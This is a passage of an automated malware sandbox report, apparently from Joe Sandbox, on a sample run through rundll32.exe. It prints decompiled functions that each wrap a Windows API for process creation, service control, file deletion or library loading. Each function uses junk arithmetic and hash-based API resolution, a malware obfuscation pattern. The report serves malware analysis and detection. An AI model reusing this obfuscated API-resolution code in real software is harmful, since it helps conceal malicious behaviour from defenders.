Instruction Fuzzy Hash: 4DF01D70915209FBDB04CFE8C95699EBFB5EB40301F20818DE444B7290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 002D4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E002D4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E002C602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002D07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x002d4f80
0x002d4f81
0x002d4f82
0x002d4f86
0x002d4f87
0x002d4f8c
0x002d4fa5
0x002d4fa8
0x002d4faf
0x002d4fb6
0x002d4fc7
0x002d4fca
0x002d4fd7
0x002d4fe2
0x002d4fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 002D4FE2

Strings

{#lm, xrefs: 002D4FC2

Memory Dump Source

Source File: 0000000B.00000002.2095271889.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true

Associated: 0000000B.00000002.2095266203.00000000002C0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2095288827.00000000002DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: d33882d87fb76e5ebab56a7135da8880e9a12e1158c87a620e895f0ba6c33620
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: D4F037B081120CFFEB04DFA4D98689EBFBAEB40300F208299E808BB260D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 002D976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E002D976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002C602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002D07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x002d9772
0x002d9773
0x002d9778
0x002d977a
0x002d977b
0x002d977e
0x002d977f
0x002d9782
0x002d9785
0x002d9788
0x002d9789
0x002d978c
0x002d978f
0x002d9790
0x002d9791
0x002d9794
0x002d9797
0x002d979a
0x002d979d
0x002d97a0
0x002d97a3
0x002d97a6
0x002d97a7
0x002d97a8
0x002d97ad
0x002d97b7
0x002d97c3
0x002d97ca
0x002d97d1
0x002d97d8
0x002d97df
0x002d97e3
0x002d97fc
0x002d9816
0x002d981d

APIs

CreateProcessW.KERNEL32(002C591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,002C591A), ref: 002D9816

Memory Dump Source

Source File: 0000000B.00000002.2095271889.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true

Associated: 0000000B.00000002.2095266203.00000000002C0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2095288827.00000000002DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: dfa07a12a7093778b355002bd6240114c3d2acebedf94738e863881bd533476b
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 2A11B372911149BBDF199F96DC0ACDF7F7AEF89750F104148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 002CB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E002CB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E002C602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002D07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x002cb569
0x002cb56a
0x002cb56d
0x002cb572
0x002cb574
0x002cb577
0x002cb57a
0x002cb57d
0x002cb580
0x002cb583
0x002cb586
0x002cb587
0x002cb58a
0x002cb58d
0x002cb590
0x002cb593
0x002cb594
0x002cb595
0x002cb59a
0x002cb5a4
0x002cb5b8
0x002cb5c0
0x002cb5c4
0x002cb5cb
0x002cb5d2
0x002cb5d9
0x002cb5e6
0x002cb5fd
0x002cb604

APIs

CreateFileW.KERNELBASE(002D0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,002D0668,?,?,?,?), ref: 002CB5FD

Memory Dump Source

Source File: 0000000B.00000002.2095271889.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true

Associated: 0000000B.00000002.2095266203.00000000002C0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2095288827.00000000002DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 1fbe7ef9f6afe1d6efb1d44d9f07503704930d2c94ac1c71e4ac2df160b915ef
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 5311C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 002D981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E002D981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002C602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002D07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x002d9821
0x002d9822
0x002d9825
0x002d9828
0x002d982a
0x002d982c
0x002d982f
0x002d9832
0x002d9835
0x002d9836
0x002d9837
0x002d983c
0x002d9855
0x002d9858
0x002d985f
0x002d9866
0x002d986d
0x002d9874
0x002d987b
0x002d988e
0x002d989b
0x002d98a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002C87F2,0000CAAE,0000510C,AD82F196), ref: 002D989B

Memory Dump Source

Source File: 0000000B.00000002.2095271889.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true

Associated: 0000000B.00000002.2095266203.00000000002C0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2095288827.00000000002DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 2c51633d4c246871e96e4ff57fc1691c1bcd40268a549b6abb8376533ba22d93
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 04014876801208BBDB04EF95D846CDFBF79EF85750F108199F918A6220E6715A619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002D7BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E002D7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002C602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002D07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x002d7bf7
0x002d7bf8
0x002d7bfa
0x002d7bfd
0x002d7bff
0x002d7c02
0x002d7c06
0x002d7c07
0x002d7c0f
0x002d7c1d
0x002d7c25
0x002d7c2d
0x002d7c31
0x002d7c38
0x002d7c3f
0x002d7c46
0x002d7c4a
0x002d7c5e
0x002d7c67
0x002d7c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 002D7C67

Memory Dump Source

Source File: 0000000B.00000002.2095271889.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true

Associated: 0000000B.00000002.2095266203.00000000002C0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2095288827.00000000002DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 98b9ead3d77cd507f006e07941fd9aeac6c860a770375a293ecb7be6740ed866
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 0C014FB190120CFFEB09DF94C84A9DEBBB5EF44314F108199F40567250E6B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 002CF65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E002CF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002C602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002D07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x002cf662
0x002cf663
0x002cf665
0x002cf668
0x002cf66a
0x002cf66d
0x002cf670
0x002cf673
0x002cf677
0x002cf678
0x002cf67d
0x002cf687
0x002cf693
0x002cf69a
0x002cf6a1
0x002cf6a5
0x002cf6a9
0x002cf6b0
0x002cf6c9
0x002cf6d8
0x002cf6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 002CF6D8

Memory Dump Source

Source File: 0000000B.00000002.2095271889.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true

Associated: 0000000B.00000002.2095266203.00000000002C0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2095288827.00000000002DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: c9a7883a01ad5096fc959c29a9ef5f670f9845c0b542d419713b3e700c14c3f7
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 0C01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90466250D6B25E21DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 002CB6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E002CB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E002C602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002D07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x002cb6f3
0x002cb6f8
0x002cb702
0x002cb70b
0x002cb712
0x002cb719
0x002cb720
0x002cb727
0x002cb72e
0x002cb747
0x002cb759
0x002cb75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 002CB759

Memory Dump Source

Source File: 0000000B.00000002.2095271889.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true

Associated: 0000000B.00000002.2095266203.00000000002C0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2095288827.00000000002DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 9b32fb81d0d8175117ce20a7d91db7207e3653248179239a21ca5cb686d466e1
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 28014FB595130CFBEF45DF94DD06E9E7BB5EF14704F108188FA09661A0D3B15E209B51

Uniqueness

Uniqueness Score: -1.00%

Function 002DAA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E002DAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002C602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002D07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x002daa3f
0x002daa40
0x002daa41
0x002daa44
0x002daa47
0x002daa4b
0x002daa4c
0x002daa51
0x002daa5b
0x002daa64
0x002daa68
0x002daa6f
0x002daa76
0x002daa8d
0x002daa90
0x002daa9d
0x002daaa8
0x002daaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 002DAAA8

Memory Dump Source

Source File: 0000000B.00000002.2095271889.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true

Associated: 0000000B.00000002.2095266203.00000000002C0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2095288827.00000000002DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 194b06c5647a5d1072d7e8c7bc8ce5f826f7c593c73fb7e5fd8c6c451a2ef93a
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 69F069B191020CFFDF08DF94DD4A99EBFB4EB40304F108188F805A6260D3B29F649B50

Uniqueness

Uniqueness Score: -1.00%

Function 002C5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E002C5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E002C602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002D07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x002c5fb5
0x002c5fb6
0x002c5fb7
0x002c5fbb
0x002c5fbc
0x002c5fc1
0x002c5fcb
0x002c5fd7
0x002c5fde
0x002c5fe5
0x002c5ffc
0x002c5fff
0x002c6006
0x002c600d
0x002c601a
0x002c6025
0x002c602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 002C6025

Memory Dump Source

Source File: 0000000B.00000002.2095271889.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true

Associated: 0000000B.00000002.2095266203.00000000002C0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2095288827.00000000002DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 06c572578a309482a68677b761cd3e400cab6d7170db5e6cfd4035d987ce0908
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: E5F04FB0C11208FFEB08DFA0E94689EBFB8EB40300F20819CE409A7260E7B15F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2444 Parent PID: 2884 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	16.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	994
Total number of Limit Nodes:	14

Executed Functions

Function 001B2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E001B2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001B602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001C07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x001b295f
0x001b2964
0x001b2967
0x001b296a
0x001b296d
0x001b296e
0x001b296f
0x001b2977
0x001b2985
0x001b298a
0x001b2992
0x001b299a
0x001b29a2
0x001b29a9
0x001b29b0
0x001b29b7
0x001b29bb
0x001b29cf
0x001b29dc
0x001b29e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001B29DC

Strings

<^, xrefs: 001B2977

Memory Dump Source

Source File: 0000000C.00000002.2095952053.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000C.00000002.2095934659.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2095986023.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 30dfe23d4da1fee25088d072443731b0ff0781665e5998f83e193314ba0cf3bf
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: C1018471900108BFEB14DF95DC0A8DFBFB6EF54310F108048F50866250D7B55F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 001BC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E001BC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001B602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001C07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x001bc6e1
0x001bc6e6
0x001bc6f0
0x001bc6fc
0x001bc703
0x001bc706
0x001bc70d
0x001bc711
0x001bc715
0x001bc71c
0x001bc723
0x001bc72a
0x001bc731
0x001bc738
0x001bc751
0x001bc762
0x001bc768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001BC762

Strings

/O, xrefs: 001BC6E6

Memory Dump Source

Source File: 0000000C.00000002.2095952053.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000C.00000002.2095934659.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2095986023.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 46e2d91a0fb16c85d3561f04043ab603bb37657e41196792dbba4e1767537ef8
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 441133B290122DBBCB25DF95DC4A8DFBFB8EF14714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 001B1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E001B1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001B602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001C07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x001b1006
0x001b1009
0x001b100c
0x001b1011
0x001b1016
0x001b101d
0x001b1026
0x001b102d
0x001b1034
0x001b103b
0x001b1047
0x001b104f
0x001b1057
0x001b105e
0x001b1065
0x001b106c
0x001b1073
0x001b1077
0x001b108b
0x001b1096
0x001b109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 001B1096

Strings

[, xrefs: 001B103B

Memory Dump Source

Source File: 0000000C.00000002.2095952053.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000C.00000002.2095934659.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2095986023.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 478305541f17ea960f27408f27b120a6598dfb591520c8eb493791fb93af5927
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: E8015BB6D01308FBDF04DF94C94AADEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

